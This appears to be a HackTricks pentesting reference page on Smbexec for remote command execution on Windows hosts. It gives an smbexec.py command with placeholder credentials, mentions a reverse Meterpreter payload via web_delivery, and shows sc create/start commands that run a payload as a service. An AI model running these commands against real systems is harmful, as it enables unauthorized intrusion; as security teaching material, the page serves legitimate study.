Search K
Appearance
Appearance
Other ways to support HackTricks:
Smbexec is a tool used for remote command execution on Windows systems, similar to Psexec, but it avoids placing any malicious files on the target system.
smbexec.py WORKGROUP/genericuser:genericpassword@10.10.10.10
web_delivery
module allows for the execution of a PowerShell-targeted reverse Meterpreter payload.Creating and starting the service can be accomplished with the following commands:
sc create [ServiceName] binPath= "cmd.exe /c [PayloadCommand]"
sc start [ServiceName]
FOr further details check https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/
Other ways to support HackTricks: